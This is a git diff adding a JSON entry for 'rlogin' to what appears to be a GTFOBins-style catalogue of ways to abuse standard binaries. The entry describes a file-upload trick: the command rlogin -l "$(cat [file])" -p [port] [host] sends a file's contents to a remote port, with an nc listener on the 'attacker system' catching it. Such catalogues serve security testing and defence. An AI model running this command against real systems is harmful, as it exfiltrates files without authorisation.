diff --git a/data/rlogin.json b/data/rlogin.json
new file mode 100644
index 0000000..a83a484
--- /dev/null
+++ b/data/rlogin.json
@@ -0,0 +1,11 @@
+{
+  "description": "Usually 'rlogin' is a symlink to 'ssh' the following works only when the real 'rlogin' is used (e.g., from the 'rsh-client' APT package).",
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send contents of a file to a TCP port. Run 'nc -l -p [port] > [file]' on the attacker system to capture the contents. 'rlogin' hangs waiting for the remote peer to close the socket. The file is corrupted by leading and trailing spurious data.",
+        "code": "rlogin -l \"$(cat [file])\" -p [port] [host]\n"
+      }
+    ]
+  }
+}
\ No newline at end of file